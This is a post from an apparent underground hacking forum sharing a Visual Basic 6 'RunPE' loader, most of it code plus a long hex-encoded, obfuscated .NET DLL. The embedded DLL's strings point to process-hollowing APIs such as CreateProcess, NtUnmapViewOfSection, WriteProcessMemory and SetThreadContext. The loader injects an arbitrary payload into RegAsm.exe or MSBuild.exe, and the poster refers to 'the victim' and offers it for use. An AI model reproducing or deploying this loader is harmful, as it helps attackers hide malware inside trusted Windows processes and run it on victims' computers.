HTDark | Underground Hacking Forum and Cybersecurity Community
  • Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

Visual Basic VB6 CLR RunPE x86 / Native & .NET

Status
Not open for further replies.
A

.:Anony:.

Leech
User
Joined
Jun 5, 2015
Messages
22
Reputation
0
Reaction score
785
Points
78
Credits
0
‎10 Years of Service‎
44%
Hello friends🙂

I took C# RunPE to import it into your favorite VB6 with the help of Common Language Runtime

So let's get started

For RunPE to work we need Net Framework 2.0, we need to import into our project two link in References:

Code: 
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.tlb
Just stipulate that the work of the victim on the computer is not as it will not affect, now Net Framework is part of windows, it is in our hands

Now you can use this RunPE

'''''''' RunPE .net CLR '''''''''
'''''''' By MR. MORFEY ''''''''''
''' My Telegram: M0RF3Y0x1337 '''

Private Declare Function DispCallFunc Lib "oleaut32" (ByVal pv As Long, ByVal ov As Long, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As Long, ByRef par As Variant) As Long
Private Declare Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As Long)
Private Declare Function VarPtrArray Lib "msvbvm60" Alias "VarPtr" (ByRef Ptr() As Any) As Long

Public Function RunPE(Arg As String, PayLoad() As Byte)
Dim host As New mscoree.CorRuntimeHost, dom As AppDomain
host.Start
host.GetDefaultDomain dom
Set DM = CreateObject("Microsoft.XMLDOM")
Set EL = DM.createElement("tmp")
EL.DataType = "bin.hex"
Dim bytes() As Byte
ShellCode = ShellCode & "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000005045"
ShellCode = ShellCode & "00004C010300997BD95D0000000000000000E00022210B010B000014000000060000000000008E32000000200000000000000000400000200000000200000400000000000000040000000000000000800000000200000000000003004085000010000010000000001000001000000000000010000000000000000000000034320000"
ShellCode = ShellCode & "57000000004000005803000000000000000000000000000000000000006000000C000000D43100001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000941200000020"
ShellCode = ShellCode & "00000014000000020000000000000000000000000000200000602E7273726300000058030000004000000004000000160000000000000000000000000000400000402E72656C6F6300000C0000000060000000020000001A000000000000000000000000000040000042000000000000000000000000000000007032000000000000"
ShellCode = ShellCode & "4800000002000500EC230000E80D000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001330020015000000000000000225280100000A037D0100000402047D020000042A000000133001000700000000000000027B010000042A001330"
ShellCode = ShellCode & "01000700000000000000027B020000042A7E7201000070280500000A720F00007003280600000A040517280F000006262A00133004001B00000001000011170A2B110203040528100000062C02172A0617580A061B31EB162A001B300A00D502000002000011160A725900007002280700000A0B1202FE15050000021203FE150400"
ShellCode = ShellCode & "00021202D005000002280800000A280900000A280A00000A7D0700000403280B00000A2D0D07726700007003280600000A0B02077E0C00000A7E0C00000A1620040000087E0C00000A141202120328040000062D06730D00000A7A041F3C280E00000A13040411041F3458280E00000A130520B30000008D11000001130611061620"
ShellCode = ShellCode & "020001009E280F00000A1A3315097B04000004110628050000062D1B730D00000A7A097B04000004110628060000062D06730D00000A7A11061F29941307161308097B0300000411071E5812081A120028090000062D06730D00000A7A110511083315097B030000041108280B0000062C06730D00000A7A0411041F5058280E0000"
ShellCode = ShellCode & "0A13090411041F5458280E00000A130A16130B097B030000041105110920003000001F40280C000006130C052D1E110C2D1A17130B097B0300000416110920003000001F40280C000006130C110C2D06730D00000A7A097B03000004110C04110A1200280A0000062D06730D00000A7A110420F800000058130D0411041C58281000"
ShellCode = ShellCode & "000A130E1613112B7004110D1F0C58280E00000A131204110D1F1058280E00000A131304110D1F1458280E00000A131411132C3811138D12000001131504111411151611158E69281100000A097B03000004110C111258111511158E691200280A0000062D06730D00000A7A110D1F2858130D1111175813111111110E328A110C28"
ShellCode = ShellCode & "1200000A130F097B0300000411071E58110F1A1200280A0000062D06730D00000A7A0411041F2858280E00000A1310110B2C041105130C11061F2C110C1110589E280F00000A1A3315097B04000004110628070000062D1B730D00000A7A097B04000004110628080000062D06730D00000A7A097B04000004280D00000615330673"
ShellCode = ShellCode & "0D00000A7ADE2326097B05000004281300000A281400000A131611162C0711166F1500000A161317DE02172A11172A000000411C0000000000003900000074020000AD02000023000000050000011E02281600000A2A42534A4201000100000000000C00000076322E302E35303732370000000005006C0000002C060000237E0000"
ShellCode = ShellCode & "98060000D004000023537472696E677300000000680B00006C00000023555300D40B0000100000002347554944000000E40B00000402000023426C6F62000000000000000200000057B5A2150902000000FA01330016C4000100000022000000050000000F0000001100000031000000220000001A00000001000000020000000200"
ShellCode = ShellCode & "0000010000000200000002000000020000000A0000000100000002000000020000000000E80201000000000006009002F70206002A016C030600FE00F7020600DF03F7020600FE03F70206006902AF0406000504F7020600B302F7020A00D70359030600EB00F7020600BD00F7020600C9026C0306001104F70206005203F7020600"
ShellCode = ShellCode & "2503F70206003F03F70206001A00F70206009A02F70206003803F70206007A04F7020600E100F7020600DE018B0306004B028B0306003E0113030600FE0113030600170213030600AC01130306007001130306003202130306008D0113030600550113030600F0006C030600160159038700AB030000000000004800000000000100"
ShellCode = ShellCode & "010001011000C901000005000100010001001000550000001500030004000B011000600000005500030012000B0110006B000000550007001200010060000A00010072000D0006006000EB0006006B00EB00060072001C01060099001C01060060001C0106006B000A00060072000A00060099000A000610A8021F010600B102EB00"
ShellCode = ShellCode & "0600BE02EB000600C502EB000600C702EB0050200000000086184C0314000100742000000000860060001A000300882000000000860072001E0003000000000080009160C9034400030000000000800091602F045B000D00000000008000916019045B000F00000000008000916056045B001100000000008000916040045B001300"
ShellCode = ShellCode & "00000000800091608A046200150000000000800091609C046D001A000000000080009160FE0278001F00000000008000916067047E00210000000000800091608300870026009B20000000008600900098002700BC200000000096002F03A4002A00E4200000000091006000A4002E00E4230000000086184C031000320000000100"
ShellCode = ShellCode & "6000000002007200000001000100000002000500000003002000000004002400000005002800000006002C00000007003800000008003C0000000900400000000A0044000000010001000000020005000000010001000000020005000000010001000000020005000000010001000000020005000000010001000000020005000000"
ShellCode = ShellCode & "03002000000004002400000005002800000001000100000002000500000003002000000004002400000005002800000001000100000002000500000001000100000002000500000003002000000004002400000005002800000001000100000001006D0000000200BA0200000300760400000100C002000002009500000003005B00"
ShellCode = ShellCode & "00000400B20000000100010000000200050000000300200000000400240009004C03100011004C032A0019004C03350031004C03100039009B008C004100F00391004100F703CE005100CF00D4006100AA02DB0069000900E1004100BF04E60071003303EB0079004C03100081001200EE0071009F02F50081003000F90099008004"
ShellCode = ShellCode & "00018100BA030B016900120011014900740016014900F202100029004C031000B1004C032601B9004C031000C1004C035301C9004C035301D1004C035301D9004C035301E1004C035301E9004C035301F1004C035301F9004C03530101014C03530109014C03D5012E000B01AB012E001300A5012E0003012F002E00FB002F002E00"
ShellCode = ShellCode & "F3002F002E00EB0098012E00E3002F002E00DB0080012E00D30058012E000A0063012E00CB0058012E001301DC012E00C30034012E00BB002B0143001B003B00430013002F00800023005600A00023005600C00023005600E00023005600000123005600200123005600400123005600600123005600800123005600A00123005600"
ShellCode = ShellCode & "1600230101000000000004000100000000000500A000AD0002000100000051002200000053002600020002000300020003000500D102DE0204010900C903010000010B002F04010000010D001904010000010F00560401000001110040040100000113008A040100000115009C04010000011700FE02020000011900670401000001"
ShellCode = ShellCode & "1B0083000100048000000100000000000000000000000000C303000002000000000000000000000001006200000000000200000000000000000000000100F702000000000400030005000300000000000000000000415F3000415F3100546F55496E74333200546F496E74333200496E74333200415F3200415F3300415F3400415F"
ShellCode = ShellCode & "3500546F496E74313600415F3600415F3700415F3800415F39003C4D6F64756C653E004100430052756E504500646174610061006D73636F726C696200620070726F6300630047657450726F636573734279496400526573756D65546872656164004C6F616400636D64006400476574456E7669726F6E6D656E745661726961626C"
ShellCode = ShellCode & "6500636F6D70617469626C650052756E74696D655479706548616E646C65004765745479706546726F6D48616E646C650056616C756554797065005479706500477569644174747269627574650041747472696275746555736167654174747269627574650044656275676761626C6541747472696275746500436F6D5669736962"
ShellCode = ShellCode & "6C6541747472696275746500417373656D626C795469746C6541747472696275746500417373656D626C7954726164656D61726B41747472696275746500417373656D626C7946696C6556657273696F6E41747472696275746500417373656D626C79436F6E66696775726174696F6E41747472696275746500417373656D626C79"
ShellCode = ShellCode & "4465736372697074696F6E41747472696275746500446F746675736361746F7241747472696275746500436F6D70696C6174696F6E52656C61786174696F6E7341747472696275746500417373656D626C7950726F6475637441747472696275746500417373656D626C79436F707972696768744174747269627574650041737365"
ShellCode = ShellCode & "6D626C79436F6D70616E794174747269627574650052756E74696D65436F6D7061746962696C697479417474726962757465005375707072657373556E6D616E61676564436F64655365637572697479417474726962757465004174747269627574650042797465006765745F53697A6500650053697A654F66006600537472696E"
ShellCode = ShellCode & "67004172670067007061746800680069004D61727368616C006B65726E656C33322E646C6C006E74646C6C2E646C6C00436C6173732E646C6C004B696C6C0053797374656D004E74556E6D6170566965774F6653656374696F6E0053797374656D2E5265666C656374696F6E00457863657074696F6E0052756E005A65726F004275"
ShellCode = ShellCode & "6666657200426974436F6E766572746572002E63746F7200496E745074720053797374656D2E446961676E6F73746963730053797374656D2E52756E74696D652E496E7465726F7053657276696365730053797374656D2E52756E74696D652E436F6D70696C6572536572766963657300446562756767696E674D6F646573004765"
ShellCode = ShellCode & "74427974657300436C6173730043726561746550726F636573730050726F63657373004174747269627574655461726765747300436F6E63617400466F726D6174004F626A65637400456E7669726F6E6D656E7400436F6E7665727400576F773634476574546872656164436F6E7465787400476574546872656164436F6E746578"
ShellCode = ShellCode & "7400576F773634536574546872656164436F6E7465787400536574546872656164436F6E74657874005669727475616C416C6C6F6345780070617900417272617900426C6F636B436F7079005265616450726F636573734D656D6F727900577269746550726F636573734D656D6F72790053797374656D2E53656375726974790049"
ShellCode = ShellCode & "734E756C6C4F72456D70747900000000000D570069006E0044006900720000495C004D006900630072006F0073006F00660074002E004E00450054005C004600720061006D00650077006F0072006B005C00760032002E0030002E00350030003700320037005C00000D200022007B0030007D0022000003200000005C34360349F5"
ShellCode = ShellCode & "EE4AAE76F941D7E8422B0008B77A5C561934E08902060E02060803200001052002010E080320000E032000080328000E03280008042001010205010000000005200101111108010001000000000011000A020E0E18180209180E101114101110040100000006000202181D080A000502180810080810080A00050218081D05081008"
ShellCode = ShellCode & "05000208180808000508180808080804000108180400010E0E0600030E0E0E0E072003010E0E1D0503070108080004020E0E1D0502200718080E1114111008081D0808080808020808061D0508080808081D051225020500020E0E1C0600011229112D0500010812290400010908040001020E020618060002081D05080300000806"
ShellCode = ShellCode & "0002061D05080A000501125108125108080500011D0508040001080905000112250802060903061D05021E2404200101080801000800000000001E01000100540216577261704E6F6E457863657074696F6E5468726F777301042001010E0A010005436C61737300001C0100133030303A303A303A352E34322E302E393531340000"
ShellCode = ShellCode & "0000000017010012436F7079726967687420C2A920203230313900000C010007312E302E302E3000000501000100002901002431393661366538342D383337652D346236342D623964362D6462626132353839343764330000062001011180890801000200000000001C012D405E5F606B626D646F6B656C6B686B6A767370744142"
ShellCode = ShellCode & "43444546000000000000997BD95D000000000200000041000000F0310000F01300005253445369C8DB59B1CE1947866EE477F8F0230201000000443A5C436C6173735C62696E5C44656275675C446F7466757363617465645C436C6173732E706462000000005C32000000000000000000007E320000002000000000000000000000"
ShellCode = ShellCode & "000000000000000000000000703200000000000000000000000000000000000000005F436F72446C6C4D61696E006D73636F7265652E646C6C0000000000FF25002040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100100000001800008000000000000000000000000000000100010000003000008000000000000000000000000000000100000000004800000058400000FC0200000000000000000000"
ShellCode = ShellCode & "FC0234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE00000100000001000000000000000100000000003F000000000000000400000002000000000000000000000000000000440000000100560061007200460069006C00650049006E0066006F0000000000240004000000"
ShellCode = ShellCode & "5400720061006E0073006C006100740069006F006E00000000000000B0045C020000010053007400720069006E006700460069006C00650049006E0066006F0000003802000001003000300030003000300034006200300000001A000100010043006F006D006D0065006E007400730000000000000022000100010043006F006D00"
ShellCode = ShellCode & "700061006E0079004E0061006D0065000000000000000000340006000100460069006C0065004400650073006300720069007000740069006F006E000000000043006C006100730073000000300008000100460069006C006500560065007200730069006F006E000000000031002E0030002E0030002E003000000034000A000100"
ShellCode = ShellCode & "49006E007400650072006E0061006C004E0061006D006500000043006C006100730073002E0064006C006C0000004800120001004C006500670061006C0043006F007000790072006900670068007400000043006F0070007900720069006700680074002000A90020002000320030003100390000002A00010001004C0065006700"
ShellCode = ShellCode & "61006C00540072006100640065006D00610072006B00730000000000000000003C000A0001004F0072006900670069006E0061006C00460069006C0065006E0061006D006500000043006C006100730073002E0064006C006C0000002C0006000100500072006F0064007500630074004E0061006D0065000000000043006C006100"
ShellCode = ShellCode & "730073000000340008000100500072006F006400750063007400560065007200730069006F006E00000031002E0030002E0030002E003000000038000800010041007300730065006D0062006C0079002000560065007200730069006F006E00000031002E0030002E0030002E003000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "0000000000000000000000000000000000000000000000000000003000000C000000903200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "000000000000000000000000000000000000"
EL.Text = ShellCode
bytes = EL.NodeTypedValue
Dim vTypes(0 To 1) As Integer
Dim vValues(0 To 1) As Long
Dim pPArry As Long: pPArry = VarPtrArray(bytes)
Dim pArry As Long
RtlMoveMemory pArry, ByVal pPArry, 4
Dim vWrap: vWrap = pArry
vValues(0) = VarPtr(vWrap)
vTypes(0) = 16411
Dim pRef As Long: pRef = 0
Dim vWrap2: vWrap2 = VarPtr(pRef)
vValues(1) = VarPtr(vWrap2)
vTypes(1) = 16396
Call DispCallFunc(ObjPtr(dom), 45 * 4, 4, vbLong, 2, vTypes(0), vValues(0), 0)
Dim aRef As mscorlib.Assembly
RtlMoveMemory aRef, pRef, 4
aRef.CreateInstance("RunPE").Load "RegAsm.exe", Arg, PayLoad
End Function


Let me tell you about the parameters

You can pass arguments to the process

Injection by Default occurs in "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe", you can use another process from this directory, for example MSBuild.exe

I hope that you would understand everything, now I wish you good luck 👋

 
Last edited by a moderator:
Status
Not open for further replies.
Back
Top